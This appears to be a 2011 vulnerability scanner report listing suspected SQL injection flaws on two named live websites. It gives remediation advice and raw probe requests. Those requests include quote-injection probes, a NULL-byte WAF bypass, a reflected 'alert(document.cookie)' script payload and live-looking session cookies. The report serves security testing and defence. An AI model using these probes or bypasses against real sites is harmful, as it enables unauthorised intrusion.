SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /socialmedia'/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp HTTP/1.1 Host: thefastertimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMDAxMzEwMCA6IDMgTTBhSjpvKzIyMG4gIDIxbjE%3D--412cad7633dbe777e841f2348764ef1fb7404c5d%7C29a20f8a34e3d1dc0bdf48916623bd44; __utmc=57436015; __qca=P0-2030699969-1296504545420; __utmb=57436015.2.10.1296504542;
Response 1
HTTP/1.0 404 Not Found Date: Mon, 31 Jan 2011 21:33:49 GMT Server: LiteSpeed Connection: close X-Powered-By: PHP/5.2.9 Vary: Cookie X-Pingback: http://thefastertimes.com/xmlrpc.php Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 31 Jan 2011 21:33:47 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profi ...[SNIP]... <a href="http://thefastertimes.com/nflpredictions/2011/01/24/was-the-new-york-jets%e2%80%99-season-a-success-or-failure/" rel="bookmark" title="Permanent Link to Was The New York Jets... Season a Success or..."> ...[SNIP]...
Request 2
GET /socialmedia''/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp HTTP/1.1 Host: thefastertimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMDAxMzEwMCA6IDMgTTBhSjpvKzIyMG4gIDIxbjE%3D--412cad7633dbe777e841f2348764ef1fb7404c5d%7C29a20f8a34e3d1dc0bdf48916623bd44; __utmc=57436015; __qca=P0-2030699969-1296504545420; __utmb=57436015.2.10.1296504542;
Response 2
HTTP/1.0 404 Not Found Date: Mon, 31 Jan 2011 21:36:07 GMT Server: LiteSpeed Connection: close X-Powered-By: PHP/5.2.9 Vary: Cookie X-Pingback: http://thefastertimes.com/xmlrpc.php Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 31 Jan 2011 21:36:03 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profi ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesize(http://thefastertimes.com/files/2011/01/obama-egypt.jpg)%20[%3Ca%20href='function.getimagesize'%3Efunction.getimagesize%3C/a%3E]:%20could%20not%20make%20seekable%20-%20http://thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp://thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1 Host: thefastertimes.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=%00' Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.1.10.1296504542; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44
Response 1 (redirected)
HTTP/1.0 404 Not Found Vary: Accept-Encoding Date: Mon, 31 Jan 2011 21:56:29 GMT Server: LiteSpeed Connection: close X-Powered-By: PHP/5.2.9 X-Pingback: http://thefastertimes.com/xmlrpc.php Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 31 Jan 2011 21:56:29 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profi ...[SNIP]... <a href="http://thefastertimes.com/childrenandimagination/2010/10/23/on-halloween-is-a-little-old-fashioned-terror-good-for-kids/" rel="bookmark" title="Permanent Link to Is Halloween Too Scary for Kids?"> ...[SNIP]...
Request 2
GET /socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesize(http://thefastertimes.com/files/2011/01/obama-egypt.jpg)%20[%3Ca%20href='function.getimagesize'%3Efunction.getimagesize%3C/a%3E]:%20could%20not%20make%20seekable%20-%20http://thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp://thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1 Host: thefastertimes.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=%00'' Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.1.10.1296504542; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44
Response 2 (redirected)
HTTP/1.0 404 Not Found Vary: Accept-Encoding Date: Mon, 31 Jan 2011 21:56:34 GMT Server: LiteSpeed Connection: close X-Powered-By: PHP/5.2.9 X-Pingback: http://thefastertimes.com/xmlrpc.php Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 31 Jan 2011 21:56:34 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profi ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1 Host: thefastertimes.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=%00' Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542
Response 1
HTTP/1.0 404 Not Found Vary: Accept-Encoding Date: Mon, 31 Jan 2011 21:40:56 GMT Server: LiteSpeed Connection: close X-Powered-By: PHP/5.2.9 X-Pingback: http://thefastertimes.com/xmlrpc.php Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 31 Jan 2011 21:40:56 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profi ...[SNIP]... <a href="http://thefastertimes.com/world/2010/08/02/wikileaks-and-afghanistan-an-authorized-leak-or-a-massive-security-failure/" rel="bookmark" title="Permanent Link to WikiLeaks and Afghanistan: An Authorized Leak..."> ...[SNIP]...
Request 2
GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1 Host: thefastertimes.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=%00'' Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542
Response 2
HTTP/1.0 404 Not Found Vary: Accept-Encoding Date: Mon, 31 Jan 2011 21:41:08 GMT Server: LiteSpeed Connection: close X-Powered-By: PHP/5.2.9 X-Pingback: http://thefastertimes.com/xmlrpc.php Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 31 Jan 2011 21:41:08 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profi ...[SNIP]...
The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1 Host: thefastertimes.com Proxy-Connection: keep-alive Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33%00'; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542
Response 1
HTTP/1.0 404 Not Found Vary: Accept-Encoding Date: Mon, 31 Jan 2011 21:25:36 GMT Server: LiteSpeed Connection: close X-Powered-By: PHP/5.2.9 X-Pingback: http://thefastertimes.com/xmlrpc.php Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 31 Jan 2011 21:25:36 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profi ...[SNIP]... <a href="http://thefastertimes.com/world/2010/08/02/wikileaks-and-afghanistan-an-authorized-leak-or-a-massive-security-failure/" rel="bookmark" title="Permanent Link to WikiLeaks and Afghanistan: An Authorized Leak..."> ...[SNIP]...
Request 2
GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1 Host: thefastertimes.com Proxy-Connection: keep-alive Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33%00''; __qca=P0-2030699969-1296504545420; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMG46MCAyYTEgbzE4SisgMTIwIE1uIDI6MzAzMDA%3D--d202b7b15423357f224e238bd365d95c721c34d6%7C29a20f8a34e3d1dc0bdf48916623bd44; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; __utmc=57436015; __utmb=57436015.2.10.1296504542
Response 2
HTTP/1.0 404 Not Found Vary: Accept-Encoding Date: Mon, 31 Jan 2011 21:25:55 GMT Server: LiteSpeed Connection: close X-Powered-By: PHP/5.2.9 X-Pingback: http://thefastertimes.com/xmlrpc.php Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Mon, 31 Jan 2011 21:25:55 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head profi ...[SNIP]...
The REST URL parameter 10 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 10, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz'/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:11:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23757 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=IBKAFEIDNFMAOFDFCGMEOJNB; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Line 1: Incorrect syntax near 'x3dUJX3ugK35Z5BBM:'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz''/x3d49/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:11:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=NBKAFEIDNCIHCNKHDGKKAKCH; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
The REST URL parameter 11 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 11, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Microsoft SQL Server.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request 1
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49'/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Connection: close Date: Mon, 31 Jan 2011 20:11:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 23757 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=HCKAFEIDIOALAOGAEJDDLLDI; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]... <font face="Arial" size=2>Line 1: Incorrect syntax near 'x3dUJX3ugK35Z5BBM:'.</font> ...[SNIP]...
Request 2
GET /articles/Web-Applications.html/x26usg/x3d__AgmUre11o3-CHR1EDljI38e-A9c/x3d/x26h/x3d447/x26w/x3d565/x26sz/x3d49''/x26hl/x3den/x26start/x3d15/x26zoom/x3d1/x26tbnid/x3dUJX3ugK35Z5BBM:/x26tbnh/x3d106/x26tbnw/x3d134/x26ei/x3dueNGTf_JEcSclgf_vvTwDw/x26prev/x3d/images HTTP/1.1 Host: www.windowsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 200 OK Connection: close Date: Mon, 31 Jan 2011 20:11:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 41859 Content-Type: text/html Set-Cookie: ASPSESSIONIDQABBTRSA=LCKAFEIDCDPENPONGFIPMPDC; path=/ Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <link rel="icon" href="/favicon.ico" type="image/x-icon"> <title>Web Applicat ...[SNIP]...
